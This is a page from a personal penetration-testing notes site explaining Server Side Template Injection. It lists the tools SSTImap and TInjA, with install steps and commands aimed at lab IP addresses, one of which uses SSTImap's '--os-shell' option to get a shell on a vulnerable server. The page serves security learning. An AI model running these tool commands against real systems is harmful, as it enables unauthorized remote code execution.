yuyudhn's notes
  • About
  • πŸš‰QUICKSTART
    • Prerequisite
    • Reconnaissance
    • Exploitation
    • Post Exploitation
    • β›ˆοΈMisc
  • πŸͺŸActive Directory
    • Basic Command
    • Enumeration
      • PowerView
    • Service Exploitation
      • LDAP
      • SMB
        • MS17-010
      • MSSQL
    • Privilege Escalation
      • Unquoted Service Path
      • UAC Bypass
      • Token Abuse
    • Post Exploitation
      • Tunneling with Ligolo-ng
    • Credential Hunting
      • Group Policy Preferences
      • DPAPI
  • MITRE ATT&CK
    • Defense Evasion
      • Physical Attack: Remove EDR
      • AMSI Bypass
    • Credential Access
      • Dump SAM Hashes via Registry
  • 🐧Linux
    • Misc
    • Linux Post Exploitation
    • Linux Password Hunting
  • 🐚Backdoor Stuff
    • Simple PHP Webshell
    • MSFvenom Generate Payload
  • πŸ“³Mobile Pentest: iOS
    • iOS Penetration Testing
    • Objection
  • πŸ•ΈοΈWeb Application
    • Common Applications
      • Tomcat
      • Joomla
    • SSTI
    • File Inclusion
    • XSS
    • Misc
  • πŸ–ŠοΈMachine Writeup
    • HackTheBox
      • Perfection
      • Pilgrimage
      • PC
      • Shoppy
      • GoodGames
      • Photobomb
      • Support
Powered by GitBook
On this page
  • Playground
  • Identification
  • Tools
  • Resources

Was this helpful?

  1. Web Application

SSTI

Notes about some basic Server Side Template Injection attack

PreviousJoomlaNextFile Inclusion

Last updated 1 year ago

Was this helpful?

Server Side Template Injection (SSTI) is a web exploit which takes advantage of an insecure implementation of a template engine.

Playground

Identification

Quick Identification

Tools

SSTImap

## Install
git clone https://github.com/vladko312/SSTImap
cd SSTImap
python3 -m venv sstimap_env
source sstimap_env/bin/activate

Usage:
python3 sstimap.py --help
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/*
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* --engine Jinja2
python3 sstimap.py --random-user-agent --url http://10.10.236.246:5000/profile/* --engine Jinja2 --os-shell

TInjA – the Template INJection Analyzer

tinja url -u "http://10.10.242.241:5000/vuln?name=a"

Resources

SSTImap

TInjA – the Template INJection Analyzer

πŸ•ΈοΈ
Template Injection Table
https://github.com/Hackmanit/TInjA
https://hackerone.com/reports/125980
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
THM: SSTI
Template Injection Playground